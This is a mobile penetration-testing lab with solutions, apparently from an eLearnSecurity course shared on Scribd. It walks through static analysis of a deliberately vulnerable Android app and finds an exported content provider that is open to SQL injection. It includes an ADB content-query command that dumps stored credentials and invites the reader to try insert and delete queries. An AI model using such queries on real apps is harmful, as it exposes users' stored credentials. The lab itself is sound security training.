Scribd
Upload
64 views

MASPTv2.5 InjectMe

The document discusses performing static code analysis on a mobile application's source code to identify potential SQL injection vulnerabilities. It provides tasks to install the application, extract application information from the manifest, enumerate content URIs, examine the source code for injection points, and exploit a vulnerability.

Uploaded by

usuario.celeste.luna
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
64 views

MASPTv2.5 InjectMe

The document discusses performing static code analysis on a mobile application's source code to identify potential SQL injection vulnerabilities. It provides tasks to install the application, extract application information from the manifest, enumerate content URIs, examine the source code for injection points, and exploit a vulnerability.

Uploaded by

usuario.celeste.luna
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 9

Static Code Analysis

InjectMe LAB

LAB Topics
Static Code Analysis

© Caendra Inc. 2017 | MASPTv2.5 | Static Code Analysis 1


SCENARIO
Before your company’s new mobile application makes it into production, the mobile security
manager tasked you with performing static code analysis against the application’s source
code. The purpose is to make sure there are not any SQL-injection vulnerabilities, since the
application is storing user credentials.

You are allowed to use all the tools in your toolkit to extract critical application information.
The objective is to find any critical injection vulnerabilities that may exist, so that it is safe
for the company’s clients to use the new application.

LAB OBJECTIVES
The objective of this lab is to highlight the importance of static code analysis while
performing a mobile application penetration test. A large amount of critical information can
be extracted through performing static code analysis on the application’s source code such
as unprotected application components, implicitly exported activities, insufficiently secure
local databases, etc. This information can be used to perform more elaborate attacks against
the application.

LEARNING OBJECTIVES
The learning objective of this lab is to provide hands-on experience in performing static code
analysis against an application’s source code in order to identify possible SQL-injection
vulnerabilities.

© Caendra Inc. 2017 | MASPTv2.5 | Static Code Analysis 2


RECOMMENDED TOOLS
 Android Studio
 “Strings” binary

RECOMMENDED CONFIGURATION
Setting up your testing environment for this lab

There can be different configurations to accommodate this lab’s testing environment. We


used the following configuration:

1. Windows 10 Machine:
Running:

 Android Studio 2.2.3


 Java verion 1.8

2. Preferred device

 Android device running API level 23

TASKS
TASK 1. INSTALLATION OF APK AND REVIEW OF THE
APPLICATION’S FUNCTIONALITY
Please install this application to your device (physical or virtual), if you run into any issues,
please use the solution section. Then, go through the application’s functionality.

© Caendra Inc. 2017 | MASPTv2.5 | Static Code Analysis 3


TASK 2. EXTRACT CRITICAL APPLICATION INFORMATION
As always, to start your analysis try to understand as much as possible about the
application’s attack surface from its manifest file.

TASK 3. ENUMERATE ALL THE POSSIBLE CONTENT URI IN


THE APPLICATION
If you haven’t already discovered a possible vulnerability by inspecting the application’s
manifest file, we recommend taking a closer look at the application’s content provider. When
dealing with content providers you will have to enumerate all possible content URI in the
application.

TASK 4. EXAMINE THE SOURCE CODE


Examine the source code based on the possible injection points you identified in Tasks 1 and
2, to validate any SQL-injection vulnerabilities.

TASK 5. EXPLOIT THE VULNERABILITY YOU IDENTIFIED


Now it is time to create some evidence to prove the vulnerability you just discovered through
static code analysis. You can do this by interacting with the vulnerable application
component and extracting sensitive information.

© Caendra Inc. 2017 | MASPTv2.5 | Static Code Analysis 4


SOLUTIONS

© Caendra Inc. 2017 | MASPTv2.5 | Static Code Analysis 5


TASK 1. INSTALLATION OF APK AND REVIEW OF THE
APPLICATION’S FUNCTIONALITY
Just like in the previous labs, to install InjectMe on your device, you can either generate a
signed APK using Android Studio and the application’s project folder or find a prebuilt APK
in the following path.

your_drive:\extracted_zip_path\InjectMe\app\build\outputs\apk

Then, you can install InjectMe on your device through an adb install command.

Now, open InjectMe in your device and go through its functionality.

You can see that you can create and store credentials using the application.

Create the following sets of credentials.

Name Password
admin1 admin123
admin2 admin234

TASK 2. EXTRACT CRITICAL APPLICATION INFORMATION


Since you were supplied with the full project folder, you can explore the actual source code
written by the developer(s).

Looking at the application’s AndroidManifest.xml file, you can see that it has a content
provider, that is insecure if the application is run on a device running an API level between
23 and 8.

The content provider is insecure due to the fact that it is implicitly exported and therefore
accessible by third-party applications, that have no specific permissions.

© Caendra Inc. 2017 | MASPTv2.5 | Static Code Analysis 6


TASK 3. ENUMERATE ALL THE POSSIBLE CONTENT URI IN
THE APPLICATION
An easy way to enumerate all possible content URI inside an application is to extract the
classes.dex file from the built APK and search within it for them.

To extract the classes.dex file from the built APK, you can simply rename the APK to a
.zip/.7z/.rar file and extract its contents.

Then, use the strings binary for Windows operating systems and execute the following
command to enumerate all possible content URI inside an application.

The strings binary for Windows can be downloaded from the link below.

https://technet.microsoft.com/en-us/sysinternals/strings.aspx

TASK 4. EXAMINE THE SOURCE CODE


Now that you have identified a possible injection point, continue exploring the source code
using Android Studio. An interesting next step would be inspecting the ContentProvider
class. There you can see a method which receives content URI values and returns a Cursor
(list of results).

© Caendra Inc. 2017 | MASPTv2.5 | Static Code Analysis 7


Then you will have to examine the source code for any other “Query” (retrieve) methods.
Fortunately, you will not find any, consequently any retrieval queries will pass through the
part of the source code above.

Walking through the Cursor method, from the top, the first conditional piece of code you
encounter in this method is a switch statement. In this case, as long as the URI is valid, it will
match one of the two options and take the URI input into the query.

© Caendra Inc. 2017 | MASPTv2.5 | Static Code Analysis 8


Next, the sort order is determined and a final query method is called.

As with any static code analysis activities, you will have to be thorough in your analysis. That
means that you should check if there is a parameterized query or a sanitization of the input,
beyond the qualification of the switch statement. Those could mitigate any injection
vulnerability that may exist. Fortunately, there aren’t any, but in general, pay attention and
don’t jump to quick conclusions.

TASK 5. EXPLOIT THE VULNERABILITY YOU IDENTIFIED


You already identified that any third-party application can communicate with the
application’s content provider.

You can interact with the insecure content provider you discovered in Task 2, either by
creating a malicious exploit application or by using ADB. In this tutorial, we will describe the
latter.

To interact with the insecure content provider, execute the following command through
ADB.

adb.exe shell content query --uri


content://com.elearnsecurity.injectme.provider.CredentialProvider/credentials

You should be able to see the following.

On your own: What other SQL codes can you run here. Can you insert, or delete?

© Caendra Inc. 2017 | MASPTv2.5 | Static Code Analysis 9

You might also like